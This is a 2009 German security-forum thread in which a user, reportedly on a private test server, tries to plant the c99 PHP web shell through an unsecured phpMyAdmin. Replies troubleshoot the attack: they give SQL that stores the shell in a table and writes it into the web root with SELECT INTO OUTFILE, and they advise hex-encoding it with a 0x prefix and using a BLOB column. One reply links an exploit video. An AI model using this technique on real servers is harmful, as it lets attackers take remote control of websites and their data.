PMA & c99.php Upload

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von shinchen, 23. März 2009 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 23. März 2009
    Mahlzeit,

    ich habe mir aus spass einen kleinen testserver aufgesetzt um mich mal am unsecured PMA zu versuchen. Der Server rennt auf Linux (Ubuntu).
    Wenn ich versuche die c99.php ins mysql zu bringen

    Code:
    CREATE TABLE tabby(codetab longtext); 
    INSERT INTO tabby(codetab) values ('MeineC99blablabla'); 
    
    klappt dies erstmal nur wenn ich das ganze in HEX vorher codiere! Wenn ich das ganze in php einfuege, dann bekomme ich immer solche meldungen:

    Code:
    Fehler
    
    MySQL meldet: Dokumentation
    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Are you sure?')) window.close()")
    );
    
    $highlight_background = "#c0c0c0";
    $hi' at line 1 
    macht fuer mich so grad alles keinen sinn.....

    und wenn ich versuche den code in den wwwroot zu schieben (SELECT * INTO OUTFILE '/var/www/c99.php' FROM tabby); kommt immer ein
    Code:
     MySQL meldet: Dokumentation
    #1 - Can't create/write to file '/var/www/c99.php' (Errcode: 13) 

    Bevor jetzt ein "lass es lieber" usw. kommt: das ist alles ein testumgebung, und ich hab gar nicht erst vor damit gross was anzufagen. das ist einfach nur mal ein how it works fuer mich!
     
  2. 23. März 2009
    AW: PMA & c99.php Upload

    Errcode: 13 kommt meines Wissens nach nur bei keinen Schreibrechten in diesem Ordner. Korrigiert mich wenn ich falsch liege ^^

    Mfg
     
  3. 23. März 2009
    AW: PMA & c99.php Upload

    hm, also das:
    MySQL meldet: Dokumentation
    #1 - Can't create/write to file '/var/www/c99.php' (Errcode: 13)

    versuch mal chmod 666 oder 777 auf die c99.php oder den www ordner zu geben. hab da jetzt auch nicht so die ahnung von, ist nur ne vermutung.
     
  4. 23. März 2009
    AW: PMA & c99.php Upload

    chmod ist ya keine loesung. ich hab zwar ssh root zugriff auf die machine, aber ich will den ja nicht benutzen sonst hat die uebung doch gar keinen sinn
     
  5. 23. März 2009
    AW: PMA & c99.php Upload

    Wenn du den Code nicht als Hex einfügst, dann sind da eventuell Zeichen drin, die in Mysql eine besondere Bedeutung haben (z.B. '). Also am besten in Hex codieren und LONGBLOB als spaltentyp auswählen.

    Der Fehler 13 wird durch fehlende Rechte verursacht, der Mysqld hat idR keine Schreibrechte für das wwwroot. Das kannst als nicht-root auch nicht umgehen.
     
  6. 23. März 2009
    AW: PMA & c99.php Upload


    Gut das hilft schonmal sehr viel weiter. Danke.
    Aber wo hat denn der mysqld denn schreibrechte?!?! bzw. muesste der nicht im phpmyadmin dir rechte haben?

    EDIT: ich kann die daten dann mach /tmp schreiben, aber dann habe ich dort nur die HEX werte in einer Zeile stehen. Diese file hatte ich dann mal ins docroot verschoben und der apache konnt damit logischerweise nix anfangen. was mache ich da falsch / wie mach ichs richtig?
     
  7. 23. März 2009
    AW: PMA & c99.php Upload

    PHP:
    use  datenbank
    DROP TABLE  IF  EXISTS  ` tabelle `; 
    CREATE TABLE tabelle  ( codetab text ); 
    INSERT INTO tabelle  ( codetab values  ( 'C99 CODE' ); 
    SELECT  INTO OUTFILE  'C:\Pfad\zum\Docroot\c99.php'  FROM tabelle
    DROP TABLE tabelle
    So hats bei mir letztens geklappt. Wichtig ist halt bei dieser Zeile,
    PHP:
    SELECT  INTO OUTFILE  'C:\Pfad\zum\Docroot\c99.php'  FROM tabelle
    dass man keine Slashes sondern Backslashes macht.

    Wunderlicherweise kommt es aber besonders bei langen Codezeilen zu Fehlern,
    bei kürzeren jedoch nicht ein einziges Mal.

    peace,
    s4ckm4n
     
  8. 24. März 2009
    AW: PMA & c99.php Upload

    Er schreibt die ja, und da ich das an einen Linux Server teste, ist der / schon der richtige. ich kann die File ya auch nach /tmp/c99.php schreiben, aber dann hab ich halt nur die HEX werte in der file stehen. Wenn ich die file mv /tmp/c99.php /var/www tu, kann der haeuptling damit nichts anfangen, da dort nur HEX werte drin stehen. das ist atm mein problem.
     
  9. 24. März 2009
    AW: PMA & c99.php Upload

    In PhpMyAdmin normal auch nicht, weil MySQL ja nix mit PMA zu tun hat, sondern PMA mit MySQL
    MySQL ist ja nicht abhängig, bzw. braucht PMA nicht...
     
  10. 24. März 2009
    AW: PMA & c99.php Upload

    Jo das klappt jetzt auch alles soweit, aber ich bekomme aus den HEX Zeichen jetzt nichtmehr die "normale" c99 shell raus .... die Datei enthaellt dann nur nur die HEX Codes mit denen der Webserver nix anzufangen weiß. Das ist grad nur noch das Problem!
     
  11. 24. März 2009
    AW: PMA & c99.php Upload

    Hast du auch (LONG)Blob als Datentyp gewählt? Wenn du Text wählst, dann gehts natürlich nicht.
     
  12. 25. März 2009
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: PMA & c99.php Upload

    Ja, habe jetzt nochmal mediumblob probiert. Ergebnis ist das gleiche...
    hab mal n screenshot gemacht:{bild-down: https://www.xup.in/tn/2009_03/92745563.jpeg}
    {bild-down: https://www.xup.in/tn/2009_03/10568166.jpeg}


    ps. hab den server jetzt auch mal auf windoze aufgesetzt.
     
  13. 25. März 2009
    AW: PMA & c99.php Upload

    Hier gibts ein Video auf Milw0rm.com passend zum Thema.
    http://www.milw0rm.com/video/watch.php?id=92
     
  14. 25. März 2009
    AW: PMA & c99.php Upload

    Hast du auch ein 0x vor den hexcode gestellt? Also z.B. "INSERT INTO bla(bla) VALUES (0x123ABC)".
    Wenn du nur "INSERT INTO bla(bla) VALUES(123ABC)" machst, dann gehts nicht.
     
  15. 25. März 2009
    AW: PMA & c99.php Upload


    AUTSCH! sorry ich bin zu bloede. Danke Pyro das ist mir jetzt regelrecht peinlich


    Danke an alle fuer eure mithilfe
     
  16. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.